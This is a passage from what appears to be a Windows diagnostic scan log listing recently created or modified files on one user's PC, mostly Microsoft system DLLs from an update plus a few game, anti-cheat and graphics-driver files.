2017-11-19 02:35 - 2017-11-19 05:09 - 000000045 _____ C:\Users\Jpoch\jagex_cl_runescape_LIVE1.dat
2017-11-19 02:35 - 2017-11-19 02:35 - 000000000 ____D C:\Users\Jpoch\jagexcache1
2017-11-19 01:36 - 2017-05-09 17:17 - 007770888 _____ (INCA Internet Co., Ltd.) C:\WINDOWS\SysWOW64\GameMon.des
2017-11-19 01:35 - 2017-11-19 01:35 - 000000000 ____D C:\Program Files\Common Files\INCA Shared
2017-11-19 01:28 - 2017-11-20 21:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL
2017-11-19 01:28 - 2017-11-19 01:28 - 000000830 ___HC C:\Users\Jpoch\Desktop\MU_LEGEND.lnk
2017-11-19 01:28 - 2017-11-19 01:28 - 000000000 ____D C:\Users\Jpoch\AppData\Local\VCLStylesSkin
2017-11-19 01:12 - 2017-11-19 01:24 - 000000000 ___DC C:\download
2017-11-19 01:11 - 2017-11-19 01:11 - 000000000 ____D C:\ProgramData\WEBZEN
2017-11-19 01:08 - 2017-11-19 01:11 - 005929456 ____C C:\Users\Jpoch\Downloads\MU_LEGEND_Downloader1.exe
2017-11-18 13:54 - 2017-11-18 13:54 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-11-18 13:54 - 2017-10-27 08:06 - 000136312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-11-18 13:54 - 2017-09-13 15:20 - 000798008 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-11-18 13:54 - 2017-09-13 15:20 - 000490296 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-11-18 13:54 - 2017-09-13 15:19 - 000927544 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-11-18 13:54 - 2017-09-13 15:19 - 000591160 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-11-18 13:53 - 2017-11-18 13:54 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2017-11-14 13:54 - 2017-11-01 21:16 - 002398696 ____C (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-11-14 13:54 - 2017-11-01 21:15 - 001239448 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-11-14 13:54 - 2017-11-01 21:13 - 000546712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-11-14 13:54 - 2017-11-01 21:13 - 000095640 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2017-11-14 13:54 - 2017-11-01 21:12 - 000654976 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-11-14 13:54 - 2017-11-01 21:12 - 000144248 ____C (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2017-11-14 13:54 - 2017-11-01 21:10 - 006557520 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-11-14 13:54 - 2017-11-01 21:05 - 000187800 ____C (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-11-14 13:54 - 2017-11-01 21:04 - 001292360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2017-11-14 13:54 - 2017-11-01 21:03 - 000223640 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-11-14 13:54 - 2017-11-01 20:49 - 001838848 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000703056 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000613136 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000362144 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000354360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-11-14 13:54 - 2017-11-01 20:45 - 000283544 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFault.exe
2017-11-14 13:54 - 2017-11-01 20:45 - 000172952 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-11-14 13:54 - 2017-11-01 20:45 - 000133896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2017-11-14 13:54 - 2017-11-01 20:44 - 023680000 ____C (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-11-14 13:54 - 2017-11-01 20:44 - 005808640 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-11-14 13:54 - 2017-11-01 20:44 - 000519680 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-11-14 13:54 - 2017-11-01 20:43 - 020372896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-11-14 13:54 - 2017-11-01 20:36 - 000099328 ____C (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-11-14 13:54 - 2017-11-01 20:35 - 000228352 ____C (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2017-11-14 13:54 - 2017-11-01 20:35 - 000128512 ____C (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 012803072 ____C (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000306176 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-11-14 13:54 - 2017-11-01 20:34 - 000168448 ____C (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-11-14 13:54 - 2017-11-01 20:34 - 000110592 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000095232 ____C (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-11-14 13:54 - 2017-11-01 20:34 - 000033792 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuautoappupdate.dll
2017-11-14 13:54 - 2017-11-01 20:32 - 008213504 ____C (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-11-14 13:54 - 2017-11-01 20:31 - 020512256 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 013381120 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 002953216 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-11-14 13:54 - 2017-11-01 20:30 - 000407040 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000388096 ____C (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000225792 ____C (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-11-14 13:54 - 2017-11-01 20:30 - 000165888 ____C (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-11-14 13:54 - 2017-11-01 20:30 - 000155136 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWWIN.EXE
2017-11-14 13:54 - 2017-11-01 20:29 - 019338240 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000805888 ____C (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000752640 ____C (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-11-14 13:54 - 2017-11-01 20:29 - 000588800 ____C (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-11-14 13:54 - 2017-11-01 20:28 - 023684096 ____C (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-11-14 13:54 - 2017-11-01 20:28 - 000002560 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 002078720 ____C (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-11-14 13:54 - 2017-11-01 20:27 - 000080896 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 000079872 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-11-14 13:54 - 2017-11-01 20:27 - 000049152 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertPKICmdlet.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 008197120 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 005963776 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 002671616 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 001937408 ____C (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000755712 ____C (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000371712 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-11-14 13:54 - 2017-11-01 20:26 - 000068608 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\OnDemandConnRouteHelper.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 012227072 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 011888128 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 004727808 ____C (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 003377664 ____C (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000370688 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000364544 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-11-14 13:54 - 2017-11-01 20:25 - 000339968 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 007598080 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000506368 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000463872 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000444928 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Launcher.dll
2017-11-14 13:54 - 2017-11-01 20:24 - 000358400 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 002516480 ____C (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000680960 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000664576 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000590336 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPKsp.dll
2017-11-14 13:54 - 2017-11-01 20:23 - 000476160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\dsreg.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 006254080 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 002859520 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 002009600 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-11-14 13:54 - 2017-11-01 20:22 - 001884160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2017-11-14 13:54 - 2017-11-01 20:22 - 001494528 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 004417024 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 003653120 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 000787456 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-11-14 13:54 - 2017-11-01 20:21 - 000658432 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-11-14 13:54 - 2017-10-24 23:40 - 000339968 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-11-14 13:54 - 2017-10-15 07:09 - 002259760 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-11-14 13:54 - 2017-10-15 07:03 - 006765728 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-11-14 13:54 - 2017-10-15 07:01 - 000583160 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-11-14 13:54 - 2017-10-15 06:53 - 002969880 ____C (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-11-14 13:54 - 2017-10-15 06:53 - 000387928 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-11-14 13:54 - 2017-10-15 06:49 - 000094616 ____C (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-11-14 13:54 - 2017-10-15 06:49 - 000025088 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-11-14 13:54 - 2017-10-15 06:46 - 004544000 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsDesktopEngine.exe
2017-11-14 13:54 - 2017-10-15 06:45 - 001292288 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-11-14 13:54 - 2017-10-15 06:45 - 001248768 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-11-14 13:54 - 2017-10-15 06:44 - 000636416 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-11-14 13:54 - 2017-10-15 06:44 - 000050176 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-11-14 13:54 - 2017-10-15 06:42 - 005225984 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-11-14 13:54 - 2017-10-15 06:42 - 003667456 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-11-14 13:54 - 2017-10-15 06:41 - 004559360 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-11-14 13:54 - 2017-10-15 06:41 - 001019904 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-11-14 13:54 - 2017-10-15 06:38 - 000089088 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-11-14 13:54 - 2017-10-15 06:14 - 000037376 ____C (Microsoft Corporation) C:\WINDOWS\system32\SEMgrPS.dll
2017-11-14 13:54 - 2017-10-15 06:10 - 001303040 ____C (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 001578904 ____C (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000678808 ____C (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000612248 ____C (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000379288 ____C (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000190360 ____C (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-11-14 13:53 - 2017-11-01 21:21 - 000136088 ____C (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 002032536 ____C (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 001144728 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 001015704 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000965016 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-11-14 13:53 - 2017-11-01 21:20 - 000821656 ____C (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000613784 ____C (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000543640 ____C (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-11-14 13:53 - 2017-11-01 21:20 - 000484248 ____C (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000469568 ____C (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000259992 ____C (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-11-14 13:53 - 2017-11-01 21:20 - 000034712 ____C (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-11-14 13:53 - 2017-11-01 21:16 - 008319384 ____C (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-11-14 13:53 - 2017-11-01 21:16 - 002327448 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-11-14 13:53 - 2017-11-01 21:15 - 000503704 ____C (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2017-11-14 13:53 - 2017-11-01 21:14 - 000667040 ____C (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-11-14 13:53 - 2017-11-01 21:14 - 000067992 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 005477088 ____C (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 002443672 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-11-14 13:53 - 2017-11-01 21:13 - 001345600 ____C (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2017-11-14 13:53 - 2017-11-01 21:13 - 000212888 ____C (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000727336 ____C (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000714648 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000643192 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000430848 ____C (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000412752 ____C (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2017-11-14 13:53 - 2017-11-01 21:12 - 000319384 ____C (Microsoft Corporation) C:\WINDOWS\system32\WerFault.exe
2017-11-14 13:53 - 2017-11-01 21:12 - 000038808 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Diskdump.sys
2017-11-14 13:53 - 2017-11-01 21:12 - 000026472 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2017-11-14 13:53 - 2017-11-01 21:11 - 021353200 ____C (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-11-14 13:53 - 2017-11-01 21:05 - 000871408 ____C (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 003668992 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-11-14 13:53 - 2017-11-01 20:37 - 001278976 ____C (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 000465920 ____C (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-11-14 13:53 - 2017-11-01 20:37 - 000184320 ____C (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-11-14 13:53 - 2017-11-01 20:37 - 000077824 ____C (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-11-14 13:53 - 2017-11-01 20:36 - 000098816 ____C (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-11-14 13:53 - 2017-11-01 20:35 - 000064000 ____C (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2017-11-14 13:53 - 2017-11-01 20:35 - 000025600 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpstorport.sys
2017-11-14 13:53 - 2017-11-01 20:35 - 000002560 ____C (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-11-14 13:53 - 2017-11-01 20:34 - 000438784 ____C (Microsoft Corporation) C:\WINDOWS\system32\SharedPCCSP.dll
2017-11-14 13:53 - 2017-11-01 20:34 - 000138240 ____C (Microsoft Corporation) C:\WINDOWS\system32\DataUsageLiveTileTask.exe
2017-11-14 13:53 - 2017-11-01 20:34 - 000113152 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000529408 ____C (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000324608 ____C (Microsoft Corporation) C:\WINDOWS\system32\DataUsageHandlers.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000090112 ____C (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000064512 ____C (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-11-14 13:53 - 2017-11-01 20:33 - 000061440 ____C (Microsoft Corporation) C:\WINDOWS\system32\CertPKICmdlet.dll
2017-11-14 13:53 - 2017-11-01 20:32 - 000255488 ____C (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2017-11-14 13:53 - 2017-11-01 20:32 - 000125952 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Storage.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000434176 ____C (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000411648 ____C (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2017-11-14 13:53 - 2017-11-01 20:31 - 000153088 ____C (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 007339008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000719872 ____C (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000635392 ____C (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000601088 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-11-14 13:53 - 2017-11-01 20:30 - 000229888 ____C (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-11-14 13:53 - 2017-11-01 20:29 - 000757248 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-11-14 13:53 - 2017-11-01 20:29 - 000415232 ____C (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 001468416 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000939008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000799744 ____C (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-11-14 13:53 - 2017-11-01 20:28 - 000772096 ____C (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000565248 ____C (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000537600 ____C (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2017-11-14 13:53 - 2017-11-01 20:27 - 000179712 ____C (Microsoft Corporation) C:\WINDOWS\system32\wersvc.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 004445696 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 003060224 ____C (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 002809344 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-11-14 13:53 - 2017-11-01 20:26 - 000986624 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 003307008 ____C (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 002052608 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-11-14 13:53 - 2017-11-01 20:25 - 001886208 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 001713664 ____C (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000972288 ____C (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000877568 ____C (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2017-11-14 13:53 - 2017-11-01 20:25 - 000684544 ____C (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-11-14 13:53 - 2017-11-01 20:24 - 004707840 ____C (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-11-14 13:53 - 2017-11-01 20:23 - 002449408 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-11-14 13:53 - 2017-11-01 20:23 - 000407040 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-11-14 13:53 - 2017-11-01 20:19 - 000124928 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\luafv.sys
2017-11-14 13:53 - 2017-10-15 06:59 - 000923040 ____C (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-11-14 13:53 - 2017-10-15 06:57 - 000712600 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-11-14 13:53 - 2017-10-15 06:57 - 000409496 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-11-14 13:53 - 2017-10-15 06:56 - 000872464 ____C (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-11-14 13:53 - 2017-10-15 06:55 - 007910960 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-11-14 13:53 - 2017-10-15 06:51 - 000584192 ____C (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-11-14 13:53 - 2017-10-15 06:15 - 000584192 ____C (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-11-14 13:53 - 2017-10-15 06:13 - 000029696 ____C (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-11-14 13:53 - 2017-10-15 06:09 - 001878016 ____C (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-11-14 13:53 - 2017-10-15 06:09 - 000527360 ____C (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-11-14 13:53 - 2017-10-15 06:08 - 001260544 ____C (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-11-14 13:53 - 2017-10-15 06:08 - 000056832 ____C (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-11-14 13:53 - 2017-10-15 06:07 - 005776384 ____C (Microsoft Corporation) C:\WINDOWS\system32\VsGraphicsDesktopEngine.exe
2017-11-14 13:53 - 2017-10-15 06:07 - 000925696 ____C (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
